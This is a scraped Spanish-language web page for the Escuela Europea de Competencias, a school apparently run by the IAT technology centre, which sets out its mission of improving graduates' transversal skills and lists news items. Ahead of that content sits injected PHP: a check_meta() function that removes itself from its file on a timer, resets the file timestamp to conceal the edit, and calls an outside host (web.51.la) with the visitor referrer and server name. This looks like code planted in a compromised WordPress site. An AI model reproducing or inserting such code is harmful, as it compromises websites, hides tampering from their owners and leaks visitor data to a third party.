check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731512){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php"); } Escuela Europea de Competencias | Presentación

Forma parte de la escuela

Regístrate y disfruta de las ventajas de ser miembro de la Escuela Europea de Competencias

Ya soy miembro de EEC

También puedes crear una cuenta.

¿Has perdido tu contraseña?

Presentación

La Escuela Europea de Competencias (EEC) es una iniciativa de IAT, centro tecnológico de ingeniería y gestión del conocimiento que acompaña a las empresas e instituciones en la mejora de sus resultados de forma sostenible, aportándoles valor mediante soluciones innovadoras.

La EEC no es una Universidad alternativa, ni una Escuela de Negocios, es un nuevo modelo que, de forma complementaria, ayuda a sus estudiantes a aumentar su empleabilidad, casi sin esfuerzo y con muy poco tiempo de dedicación.

La Escuela responde a la paradójica dificultad de las Empresas para cubrir sus necesidades de personal, existiendo a la vez tantos recién titulados universitarios que buscan una oportunidad para obtener experiencias profesionales.

Así, con la visión de convertirse en un referente en el ajuste de perfiles competenciales a las necesidades de la Sociedad, la Escuela nace con la misión de contribuir al ajuste entre los perfiles profesionales ofertados y los demandados en el entorno global en que operan las Empresas, actuando sobre las competencias transversales (no técnicas) de los estudiantes universitarios, futuros profesionales.

Para alcanzar el objetivo de contribuir  al desarrollo e integración en el mercado de trabajo de los futuros profesionales, a la vez que se apoya la sostenibilidad de las Empresas, la Escuela se compromete a realizar acciones encaminadas a:

  • Difundir y dar a conocer la realidad empresarial y sus modos de operar en un entorno global y competitivo.
  • Acompañar  a los futuros profesionales (estudiantes), personas desempleadas y emprendedoresa hacia la obtención de perfiles competenciales valorados en el mercado de trabajo.
  • Ofrecer experiencias donde se produzcan aprendizajes significativos enfocados al desarrollo de competencias y a la promoción de la capacidad de aprender a aprender.
  • Asesorar a los futuros profesionales en las claves para el desarrollo de competencias en sus actividades cotidianas.
  • Facilitar a las Empresas profesionales con perfiles competenciales acordes a sus necesidades de recursos.
  • Generar y transferir conocimiento a los grupos de interés:
Estudiantes universitarios, personas en desempleo o empleadas
con necesidad de desarrollar competencias que faciliten su integración o consolidación en el mercado de trabajo.

Emprendedores y personas que optan por el autoempleo como modo de inserción en el mercado se trabajo.

Las Empresas, con necesidad de mejorar el ajuste del perfil competencial de sus profesionales con sus valores, estrategias y políticas, logrando que contribuyan a su competitividad y sostenibilidad. En este sentido, la Escuela actuará de forma complementaria a otras instituciones o centros, como nexo o vínculo de ajuste entre los futuros profesionales y las necesidades del tejido empresarial.
La Administración Pública, con necesidad de adquirir conocimiento actualizado sobre los perfiles competenciales demandados por el mercado de trabajo y las estrategias de desarrollo de competencias transversales que facilitan la empleabilidad de los trabajadores (desempleados y en activo).
La Sociedad, donde deben revertir los resultados logrando aumentar el bienestar común.

La singularidad de la Escuela se centra tanto en su innovador concepto basado en el BENEFICIO COMÚN, como en su ESTRATEGIA DE DESARROLLO DE COMPETENCIAS demandadas en las empresas actuales.

 

Noticias recientes

Formación “Gestor de Marketing Internacional” – Especialízate gratis!

Formación "Gestor de Marketing Internacional" - Especialízate gratis!

M.IN.D – “Marketing, Internacionalización y Desarrollo”,  es un proyecto europeo de la con[...]

Desmitificando el liderazgo

Desmitificando el liderazgo

¡Menos líderes y más liderazgo! ¡El liderazgo es acción, con un objetivo y un fin claro; no es[...]

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

Sevilla, 2 de Diciembre a las 11:00 horas ¿Sabías que las habilidades de búsqueda de empleo pued[...]

La Escuela en fotos

Accede a nuestra galería de imágenes en Flickr

Activos Recientemente

Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario

La escuela en la red

My Great Web page